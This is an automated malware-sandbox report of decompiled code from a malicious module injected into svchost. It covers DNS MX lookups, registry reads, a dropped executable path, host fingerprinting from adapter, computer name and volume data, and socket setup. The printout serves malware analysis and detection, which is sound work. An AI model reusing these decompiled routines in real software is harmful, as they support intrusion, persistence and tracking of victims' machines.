0x00000000
0x0032411c
0x003240f1
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00324070
ExitProcess.KERNEL32 ref: 00324121

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: CreateEventExitProcess
String ID:
API String ID: 2404124870-0
Opcode ID: 4b0e3c4becd3bcb60357a62fa7f7f87a27ff9ca1bda83a5c692f886c728ad80b
Instruction ID: af533c85545c56ed7c30f603727008660c8dd7cc9d1ac366ea944e07b2f544b0
Opcode Fuzzy Hash: 4b0e3c4becd3bcb60357a62fa7f7f87a27ff9ca1bda83a5c692f886c728ad80b
Instruction Fuzzy Hash: DD51C1B1D00228BBEB26ABA0BD86FBF7B7CEF10714F010065F610E6090E7349A51C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00322D21, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85
memorylibrarystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E00322D21(intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				char _v28;
				struct HINSTANCE__* _t19;
				_Unknown_base(*)()* _t20;
				void* _t22;
				long* _t30;
				intOrPtr* _t37;
				long _t39;
				long _t40;
				void* _t41;

				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_t19 = GetModuleHandleA( &_v28);
				_t39 = 0;
				if(_t19 != 0) {
					L3:
					_t20 = GetProcAddress(_t19, "DnsQuery_A");
					if(_t20 == _t39) {
						L2:
						return 0;
					}
					_t35 =  &_v16;
					_t22 =  *_t20(_a4, 0xf, _t39, _t39,  &_v16, _t39); // executed
					if(_t22 != 0) {
						goto L2;
					}
					_t37 = _v16;
					_v8 = _t39;
					_v12 = _t39;
					if(_t37 == _t39) {
						L14:
						return _v12;
					}
					do {
						if( *((short*)(_t37 + 8)) != 0xf) {
							goto L12;
						}
						_t40 = HeapAlloc(GetProcessHeap(), _t39, 0x108);
						if(_t40 == 0) {
							break;
						}
						E0032EE2A(_t35, _t40, 0, 0x108);
						_t41 = _t41 + 0xc;
						 *(_t40 + 4) =  *(_t37 + 0x1c) & 0x0000ffff;
						_t13 = _t40 + 8; // 0x8
						lstrcpynA(_t13,  *(_t37 + 0x18), 0xff);
						_t30 = _v8;
						_v8 = _t40;
						if(_t30 != 0) {
							 *_t30 = _t40;
						} else {
							_v12 = _t40;
						}
						L12:
						_t37 =  *_t37;
						_t39 = 0;
					} while (_t37 != 0);
					goto L14;
				}
				_t19 = LoadLibraryA( &_v28);
				if(_t19 != 0) {
					goto L3;
				}
				goto L2;
			}

0x00322d31
0x00322d32
0x00322d33
0x00322d39
0x00322d3a
0x00322d40
0x00322d44
0x00322d5b
0x00322d61
0x00322d69
0x00322d54
0x00000000
0x00322d54
0x00322d6c
0x00322d77
0x00322d7b
0x00000000
0x00000000
0x00322d7d
0x00322d80
0x00322d83
0x00322d88
0x00322deb
0x00000000
0x00322deb
0x00322d90
0x00322d95
0x00000000
0x00000000
0x00322da6
0x00322daa
0x00000000
0x00000000
0x00322db0
0x00322db9
0x00322dc1
0x00322dc7
0x00322dcb
0x00322dd1
0x00322dd4
0x00322dd9
0x00322de0
0x00322ddb
0x00322ddb
0x00322ddb
0x00322de2
0x00322de2
0x00322de4
0x00322de6
0x00000000
0x00322dea
0x00322d4a
0x00322d52
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000,73BCEA30,?,00000000,00322F01,?,003220FF,00332000), ref: 00322D3A
LoadLibraryA.KERNEL32(?), ref: 00322D4A
GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 00322D61
DnsQuery_A.DNSAPI(00000000,0000000F,00000000,00000000,?,00000000), ref: 00322D77
GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 00322D99
HeapAlloc.KERNEL32(00000000), ref: 00322DA0
lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 00322DCB

Strings

DnsQuery_A, xrefs: 00322D5B
dnsapi.dll, xrefs: 00322D29

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcessQuery_lstrcpyn
String ID: DnsQuery_A$dnsapi.dll
API String ID: 233223969-3847274415
Opcode ID: fd640623278678fdb50409772e05ce9942ab36474b67b32ed3e56399439203ef
Instruction ID: e2047843ad13ace31389cc77ac71bbd3382b13976c95c437f62e60c969f8d5de
Opcode Fuzzy Hash: fd640623278678fdb50409772e05ce9942ab36474b67b32ed3e56399439203ef
Instruction Fuzzy Hash: 4C217F75900636BBCB239F64EC84AAFBBBCEF08B50F114051F915E7110D7B0AA8587D0

Uniqueness

Uniqueness Score: -1.00%

Function 003280C9, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E003280C9(int* __ecx) {
				int _v8;
				void* _v12;
				int _v16;
				char _v20;
				char _v52;
				char _v312;
				void* _t27;
				void* _t31;
				char* _t35;
				char* _t42;
				char* _t45;
				intOrPtr* _t49;
				intOrPtr _t52;
				intOrPtr _t57;
				void* _t60;
				intOrPtr _t63;
				void* _t65;
				void* _t68;
				char _t70;
				intOrPtr _t71;

				_t56 = __ecx;
				_v8 = 0;
				 *0x332c3c = 0;
				 *0x332c38 = 0;
				if(E00326EC3() != 0) {
					_t27 = E0032704C(0x330264, 0, 0,  &_v312,  &_v52);
					_t65 = _t65 + 0x14;
					if(_t27 <= 0 || _v312 == 0 || _v52 == 0) {
						goto L20;
					} else {
						_t35 = E00322544(0x3322f8,  &E003306AC, 0x2e, 0xe4, 0xc8);
						_t68 = _t65 + 0x14;
						if(RegOpenKeyExA(0x80000001, _t35, 0, 0x101,  &_v12) != 0) {
							L19:
							E0032EE2A(_t56, 0x3322f8, 0, 0x100);
							_t65 = _t68 + 0xc;
							goto L20;
						}
						if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, 0,  &_v8) != 0 || _v16 != 1 || _v8 <= 0) {
							L15:
							_t42 =  *0x332c3c; // 0x0
							if(_t42 == 0) {
								goto L18;
							}
							E0032EC2E(_t42);
							 *0x332c3c = 0;
							goto L17;
						} else {
							_t45 = E0032EBCC(_v8);
							_pop(_t56);
							 *0x332c3c = _t45;
							if(_t45 == 0) {
								L18:
								RegCloseKey(_v12);
								goto L19;
							}
							_t56 =  &_v8;
							if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, _t45,  &_v8) != 0) {
								goto L15;
							}
							_t49 =  &_v312;
							_t60 = _t49 + 1;
							do {
								_t57 =  *_t49;
								_t49 = _t49 + 1;
							} while (_t57 != 0);
							_t52 = E0032EBCC(_t49 - _t60 + 1);
							_pop(_t56);
							 *0x332c38 = _t52;
							if(_t52 == 0) {
								goto L18;
							}
							E0032EF00(_t52,  &_v312);
							L17:
							_pop(_t56);
							goto L18;
						}
					}
				} else {
					E00327EE6(_t56); // executed
					L20:
					_t70 = "C:\\Windows\\SysWOW64\\shayesoq\\lagavljy.exe"; // 0x43
					if(_t70 != 0) {
						_t71 =  *0x3321a4; // 0x4c800
						if(_t71 == 0) {
							_t31 = E0032675C("C:\\Windows\\SysWOW64\\shayesoq\\lagavljy.exe",  &_v20, 0); // executed
							_t61 = _t31;
							if(_t31 != 0) {
								_t63 = _v20;
								 *0x3322d4 = E003224C2(_t61, _t63, 0);
								 *0x3321a4 = _t63;
								E0032EC2E(_t61);
							}
						}
					}
					return 1;
				}
			}

0x003280c9
0x003280d7
0x003280da
0x003280e0
0x003280ed
0x0032810b
0x00328110
0x00328115
0x00000000
0x00328130
0x00328151
0x00328156
0x00328167
0x00328216
0x0032821d
0x00328222
0x00000000
0x00328222
0x0032818b
0x003281f7
0x003281f7
0x003281fe
0x00000000
0x00000000
0x00328201
0x00328206
0x00000000
0x00328198
0x0032819b
0x003281a0
0x003281a1
0x003281a8
0x0032820d
0x00328210
0x00000000
0x00328210
0x003281aa
0x003281c2
0x00000000
0x00000000
0x003281c4
0x003281ca
0x003281cd
0x003281cd
0x003281cf
0x003281d0
0x003281d8
0x003281dd
0x003281de
0x003281e5
0x00000000
0x00000000
0x003281ef
0x0032820c
0x0032820c
0x00000000
0x0032820c
0x0032818b
0x003280ef
0x003280ef
0x00328225
0x00328225
0x0032822b
0x0032822d
0x00328233
0x0032823f
0x00328244
0x0032824b
0x0032824d
0x00328259
0x0032825e
0x00328264
0x00328269
0x0032824b
0x00328233
0x00328273
0x00328273

APIs

RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,73B743E0,00000000), ref: 0032815F
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,0032A45F,?,?,00000000,00000101,?,?,?,?,73B743E0,00000000), ref: 00328187
RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,0032A45F,?,?,00000000,00000101,?,?,?,?,73B743E0,00000000), ref: 003281BE
RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,73B743E0,00000000), ref: 00328210

Part of subcall function 0032675C: SetFileAttributesA.KERNEL32(?,00000080,?,73B743E0,00000000), ref: 0032677E
Part of subcall function 0032675C: CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,73B743E0,00000000), ref: 0032679A
Part of subcall function 0032675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,73B743E0,00000000), ref: 003267B0
Part of subcall function 0032675C: SetFileAttributesA.KERNEL32(?,00000002,?,73B743E0,00000000), ref: 003267BF
Part of subcall function 0032675C: GetFileSize.KERNEL32(000000FF,00000000,?,73B743E0,00000000), ref: 003267D3
Part of subcall function 0032675C: ReadFile.KERNELBASE(000000FF,?,00000040,00328244,00000000,?,73B743E0,00000000), ref: 00326807
Part of subcall function 0032675C: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,73B743E0,00000000), ref: 0032681F
Part of subcall function 0032675C: ReadFile.KERNELBASE(000000FF,?,000000F8,?,00000000,?,73B743E0,00000000), ref: 0032683E
Part of subcall function 0032675C: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,73B743E0,00000000), ref: 0032685C

Part of subcall function 0032EC2E: GetProcessHeap.KERNEL32(00000000,'2,00000000,0032EA27,00000000), ref: 0032EC41
Part of subcall function 0032EC2E: RtlFreeHeap.NTDLL(00000000), ref: 0032EC48

Strings

C:\Windows\SysWOW64\shayesoq\lagavljy.exe, xrefs: 00328225, 0032823A

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
String ID: C:\Windows\SysWOW64\shayesoq\lagavljy.exe
API String ID: 124786226-1179203262
Opcode ID: 23c2802ea43c089ea2ba9379389f1238525124393ad6acf0b7f866eb563d607a
Instruction ID: 7c3961baac688f9ecda6f598de1078d6bab9d375e944fe19ced83f77861a3568
Opcode Fuzzy Hash: 23c2802ea43c089ea2ba9379389f1238525124393ad6acf0b7f866eb563d607a
Instruction Fuzzy Hash: FD4181B2906229BFEB17EBA4FDC1DBF776CEB14300F15486AF501E6051EA706E448B61

Uniqueness

Uniqueness Score: -1.00%

Function 00321AC3, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00321AC3() {
				signed int _v8;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _t19;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr* _t28;
				signed int _t39;
				void* _t41;
				intOrPtr _t43;

				_v16 = 0;
				_t19 = LoadLibraryA("Iphlpapi.dll");
				if(_t19 == 0) {
					L15:
					return _v16;
				}
				_t28 = GetProcAddress(_t19, "GetAdaptersAddresses");
				if(_t28 == 0) {
					L14:
					goto L15;
				}
				_push( &_v12);
				_v8 = 0;
				_v12 = 0;
				_push(0);
				while(1) {
					_t23 =  *_t28(2, 0, 0); // executed
					_t41 = _t23;
					if(_t41 != 0x6f) {
						break;
					}
					_t24 = E0032EBED(_v8, _v12);
					if(_t24 == 0) {
						break;
					}
					_push( &_v12);
					_v8 = _t24;
					_push(_t24);
				}
				if(_t41 != 0) {
					L11:
					if(_v8 != 0) {
						E0032EC2E(_v8);
					}
					L13:
					goto L14;
				}
				_t26 = _v8;
				if(_t26 == 0) {
					goto L13;
				} else {
					goto L8;
				}
				do {
					L8:
					_t43 =  *((intOrPtr*)(_t26 + 0x34));
					_t39 = 0;
					if(_t43 <= 0) {
						goto L10;
					} else {
						goto L9;
					}
					do {
						L9:
						_v16 = _v16 ^ ( *(_t26 + _t39 + 0x2c) & 0x000000ff) << (_t39 & 0x00000003) << 0x00000003;
						_t39 = _t39 + 1;
					} while (_t39 < _t43);
					L10:
					_t26 =  *((intOrPtr*)(_t26 + 8));
				} while (_t26 != 0);
				goto L11;
			}

0x00321ad1
0x00321ad4
0x00321adc
0x00321b6b
0x00321b70
0x00321b70
0x00321aef
0x00321af3
0x00321b6a
0x00000000
0x00321b6a
0x00321af9
0x00321afa
0x00321afd
0x00321b00
0x00321b1c
0x00321b20
0x00321b22
0x00321b27
0x00000000
0x00000000
0x00321b09
0x00321b12
0x00000000
0x00000000
0x00321b17
0x00321b18
0x00321b1b
0x00321b1b
0x00321b2b
0x00321b5b
0x00321b5e
0x00321b63
0x00321b68
0x00321b69
0x00000000
0x00321b69
0x00321b2d
0x00321b32
0x00000000
0x00000000
0x00000000
0x00000000
0x00321b34
0x00321b34
0x00321b34
0x00321b37
0x00321b3b
0x00000000
0x00000000
0x00000000
0x00000000
0x00321b3d
0x00321b3d
0x00321b4c
0x00321b4f
0x00321b50
0x00321b54
0x00321b54
0x00321b57
0x00000000

APIs

LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00321AD4
GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00321AE9
GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,00000001), ref: 00321B20

Strings

GetAdaptersAddresses, xrefs: 00321AE3
Iphlpapi.dll, xrefs: 00321ACC

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: AdaptersAddressAddressesLibraryLoadProc
String ID: GetAdaptersAddresses$Iphlpapi.dll
API String ID: 3646706440-1087626847
Opcode ID: 0e424de09e689b5060c1b3d8ace53c9a49d3956767d526e2878caf090fabb279
Instruction ID: 7b2389ff27a8cde15720f41ced5182a4b5cd9706f3ea177b676a1520a94241e0
Opcode Fuzzy Hash: 0e424de09e689b5060c1b3d8ace53c9a49d3956767d526e2878caf090fabb279
Instruction Fuzzy Hash: 7511AF71A01138AFCB2B9BA4AE858AEBBB9EB68B10F154056E005A7150E7304E40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0032E3CA, Relevance: 7.6, APIs: 5, Instructions: 136
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0032E3CA(void* __edx, void* _a4, char* _a8, intOrPtr* _a12) {
				int* _v8;
				int _v12;
				void* _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				int _v32;
				int* _v36;
				char _v68;
				long _t50;
				intOrPtr* _t52;
				int _t69;
				intOrPtr _t75;
				int _t78;
				intOrPtr _t80;
				void* _t82;
				void* _t84;
				void* _t85;
				int _t89;
				void* _t91;
				void* _t92;
				void* _t93;

				_t82 = __edx;
				_v36 = 0;
				_t50 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v16); // executed
				if(_t50 != 0) {
					L16:
					return _v36;
				}
				_t52 = _a12;
				_t89 = 0;
				_t6 = _t52 + 1; // 0x3328f9
				_t84 = _t6;
				do {
					_t80 =  *_t52;
					_t52 = _t52 + 1;
				} while (_t80 != 0);
				_t85 = _t52 - _t84;
				_v8 = 0;
				if(_t85 > 0x1c) {
					_t85 = 0x1c;
				}
				E0032EE08( &_v68, _a12, _t85);
				_t56 = _t91 + _t85 - 0x40;
				_v12 = 0;
				_v20 = _t91 + _t85 - 0x40;
				E0032F1ED(0, _t56, 0xa);
				_t93 = _t92 + 0x18;
				if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) != 0) {
					L15:
					RegCloseKey(_v16);
					goto L16;
				} else {
					do {
						_t89 = _t89 + _v12;
						_v8 = _v8 + 1;
						_v12 = 0;
						E0032F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
					} while (RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) == 0);
					if(_t89 <= 0) {
						goto L15;
					}
					_v32 = _t89;
					E0032DB2E(_t89);
					_t69 =  *0x3336c4; // 0x0
					if(_t69 == 0) {
						goto L15;
					}
					_v12 = _t69;
					_v8 = 0;
					while(1) {
						_v28 = _t89;
						E0032F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
						if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, _v12,  &_v28) != 0) {
							break;
						}
						_t78 = _v28;
						if(_t78 == 0) {
							break;
						}
						_v12 =  &(_v12[_t78]);
						_t89 = _t89 - _t78;
						_v8 = _v8 + 1;
						if(_t89 > 0) {
							continue;
						}
						break;
					}
					_t106 = _t89;
					if(_t89 == 0) {
						_t75 =  *0x3336c4; // 0x0
						E00322544(_t75, _t75, _v32, 0xe4, 0xc8);
						E0032E332(_t82, _t106,  *0x3336c4, _v32);
						_v36 = 1;
					}
					goto L15;
				}
			}

0x0032e3ca
0x0032e3e0
0x0032e3e6
0x0032e3ee
0x0032e528
0x0032e52d
0x0032e52d
0x0032e3f4
0x0032e3f9
0x0032e3fb
0x0032e3fb
0x0032e3fe
0x0032e3fe
0x0032e400
0x0032e401
0x0032e407
0x0032e409
0x0032e40f
0x0032e413
0x0032e413
0x0032e41c
0x0032e421
0x0032e429
0x0032e42c
0x0032e42f
0x0032e43a
0x0032e452
0x0032e51d
0x0032e520
0x00000000
0x0032e458
0x0032e458
0x0032e458
0x0032e45b
0x0032e463
0x0032e469
0x0032e46e
0x0032e484
0x0032e48a
0x00000000
0x00000000
0x0032e491
0x0032e494
0x0032e499
0x0032e4a1
0x00000000
0x00000000
0x0032e4a3
0x0032e4a6
0x0032e4a9
0x0032e4ae
0x0032e4b4
0x0032e4b9
0x0032e4d3
0x00000000
0x00000000
0x0032e4d5
0x0032e4da
0x00000000
0x00000000
0x0032e4dc
0x0032e4df
0x0032e4e1
0x0032e4e6
0x00000000
0x00000000
0x00000000
0x0032e4e6
0x0032e4e8
0x0032e4ea
0x0032e4ec
0x0032e500
0x0032e50e
0x0032e516
0x0032e516
0x00000000
0x0032e4ea

APIs

RegOpenKeyExA.KERNELBASE(80000001,0032E5F2,00000000,00020119,0032E5F2,003322F8), ref: 0032E3E6
RegQueryValueExA.ADVAPI32(0032E5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 0032E44E
RegQueryValueExA.ADVAPI32(0032E5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 0032E482
RegQueryValueExA.ADVAPI32(0032E5F2,?,00000000,?,80000001,?), ref: 0032E4CF
RegCloseKey.ADVAPI32(0032E5F2,?,?,?,?,000000C8,000000E4), ref: 0032E520

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 6cb4c45d3da11600b168567bde6e1bf8fedcaf846f94c36d7a96fd347d7b0923
Instruction ID: 02d87061851d2e6a57490ccea73ade7b0e5febca5adf014b2c929f21aa766287
Opcode Fuzzy Hash: 6cb4c45d3da11600b168567bde6e1bf8fedcaf846f94c36d7a96fd347d7b0923
Instruction Fuzzy Hash: 274128B2D0022DBFDF12AFD4EC82DEEBBBDEB04304F154066F911A6150E3319A558BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0032F26D, Relevance: 7.6, APIs: 5, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 0032F2A0
setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 0032F2C0
setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 0032F2DD
setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0032F2EC
setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0032F2FD

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 0674a2207ba544c168a379ea174d6fe8f9c6fef60e27cb415f8d5fa8ca31dafe
Instruction ID: ce1984975b89070e13fc3259cbb8df14b7dfed6a74b873e5e7aca256820b55cc
Opcode Fuzzy Hash: 0674a2207ba544c168a379ea174d6fe8f9c6fef60e27cb415f8d5fa8ca31dafe
Instruction Fuzzy Hash: 4C110AB2A40248BAEF11DF94CD85FDE7FBCEB44751F008066BB04EA1D0E6B19A44CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00321BDF, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E00321BDF() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				void* _t14;
				signed int _t21;
				signed int _t30;
				void* _t31;

				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t30 = 0;
				_v12 = 0;
				asm("stosb");
				_v8 = 0xf;
				_t14 = E00321AC3(); // executed
				if(_t14 == 0) {
					if(GetComputerNameA( &_v28,  &_v8) == 0) {
						L6:
						GetVolumeInformationA(0, 0, 4,  &_v12, 0, 0, 0, 0);
						return _v12;
					}
					_t21 = 0;
					if(_v8 <= 0) {
						goto L6;
					} else {
						goto L3;
					}
					do {
						L3:
						_t30 = _t30 ^  *(_t31 + _t21 - 0x18) << (_t21 & 0x00000003) << 0x00000003;
						_t21 = _t21 + 1;
					} while (_t21 < _v8);
					if(_t30 == 0) {
						goto L6;
					}
					return _t30;
				}
				return _t14;
			}

0x00321bec
0x00321bf2
0x00321bf3
0x00321bf4
0x00321bf5
0x00321bf7
0x00321bf9
0x00321bfc
0x00321bfd
0x00321c04
0x00321c0b
0x00321c1d
0x00321c45
0x00321c51
0x00000000
0x00321c57
0x00321c1f
0x00321c24
0x00000000
0x00000000
0x00000000
0x00000000
0x00321c26
0x00321c26
0x00321c35
0x00321c37
0x00321c38
0x00321c3f
0x00000000
0x00000000
0x00000000
0x00321c41
0x00321c5e

APIs

Part of subcall function 00321AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00321AD4
Part of subcall function 00321AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00321AE9
Part of subcall function 00321AC3: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,00000001), ref: 00321B20

GetComputerNameA.KERNEL32 ref: 00321C15
GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 00321C51

Strings

localcfg, xrefs: 00321BE7
hi_id, xrefs: 00321BE5

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: AdaptersAddressAddressesComputerInformationLibraryLoadNameProcVolume
String ID: hi_id$localcfg
API String ID: 2794401326-2393279970
Opcode ID: ff46be74d6fdad0c89c9a97488d8cd43889b0f7ef964576487fd0a5a9174664d
Instruction ID: ddec21adb9d864d9bbeee3d24ccfc9c6eab6f98d06d25aaf28e0c155ef0cb574
Opcode Fuzzy Hash: ff46be74d6fdad0c89c9a97488d8cd43889b0f7ef964576487fd0a5a9174664d
Instruction Fuzzy Hash: 45019276A40138BFEB15DAF8DDC59EFBBBCEB54745F110475E602E3100D2309E4486A0

Uniqueness

Uniqueness Score: -1.00%

Function 00322684, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(00000001), ref: 00322693
gethostbyname.WS2_32(00000001), ref: 0032269F

Strings

time_cfg, xrefs: 00322684
~s`ysps, xrefs: 00322693

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: gethostbynameinet_addr
String ID: time_cfg$~s`ysps
API String ID: 1594361348-2010419113
Opcode ID: a12a763d676d52e6312fe8564fb53c13371d1560dd2441ac86e5ebbcfa7e61d5
Instruction ID: 038e709f93dbd5a10819b027e220a1e7b69cdfe029db87abf0c24d57eb88fad0
Opcode Fuzzy Hash: a12a763d676d52e6312fe8564fb53c13371d1560dd2441ac86e5ebbcfa7e61d5
Instruction Fuzzy Hash: E5E0C231204021AFCB128B28FC88AC777E8EF06330F024580F440D31A0C7B0DCC08780

Uniqueness

Uniqueness Score: -1.00%

Function 00321B71, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00321B71() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				signed int _t12;
				signed int _t28;

				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v8 = 0;
				asm("stosb");
				_v12 = 0xf;
				_t12 = E00321AC3(); // executed
				GetComputerNameA( &_v28,  &_v12);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); // executed
				_t28 = (_v28 ^ _v8 ^ _t12) & 0x7fffffff;
				_v8 = _t28;
				if(_t28 == 0) {
					return E0032ECA5() & 0x7fffffff;
				}
				return _t28;
			}

0x00321b7e
0x00321b84
0x00321b85
0x00321b86
0x00321b87
0x00321b89
0x00321b8c
0x00321b8d
0x00321b94
0x00321ba3
0x00321bb8
0x00321bc8
0x00321bca
0x00321bcd
0x00000000
0x00321bd8
0x00000000

APIs

Part of subcall function 00321AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00321AD4
Part of subcall function 00321AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00321AE9
Part of subcall function 00321AC3: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,00000001), ref: 00321B20

GetComputerNameA.KERNEL32 ref: 00321BA3
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,00321EFD,00000000,00000000,00000000,00000000), ref: 00321BB8

Strings

localcfg, xrefs: 00321B7B

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: AdaptersAddressAddressesComputerInformationLibraryLoadNameProcVolume
String ID: localcfg
API String ID: 2794401326-1857712256
Opcode ID: 94cdc34057a8d1d9c6c252f4c119240ffaff04a187223f4fe2b0e58cdf1b6d6f
Instruction ID: 963803fef8369b84bad141e066d349c3d321d22373cfd7f371f9af9af9534be8
Opcode Fuzzy Hash: 94cdc34057a8d1d9c6c252f4c119240ffaff04a187223f4fe2b0e58cdf1b6d6f
Instruction Fuzzy Hash: 40014BB6D00118BFEB029BE9DC819EFFABCAB58751F150162A601E7151D6705E0846A0

Uniqueness

Uniqueness Score: -1.00%

Function 0032EC2E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0032EC2E(char _a4) {
				void* _t2;
				char _t5;
				void* _t7;

				_t1 =  &_a4; // 0x32ea27
				_t7 =  *_t1;
				if(_t7 != 0) {
					E0032EBA0(_t7);
					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _t7); // executed
					return _t5;
				}
				return _t2;
			}

0x0032ec2f
0x0032ec2f
0x0032ec35
0x0032ec38
0x0032ec48
0x00000000
0x0032ec48
0x0032ec4f

APIs

Part of subcall function 0032EBA0: GetProcessHeap.KERNEL32(00000000,00000000,0032EC0A,00000000,80000001,?,0032DB55,7FFF0001), ref: 0032EBAD
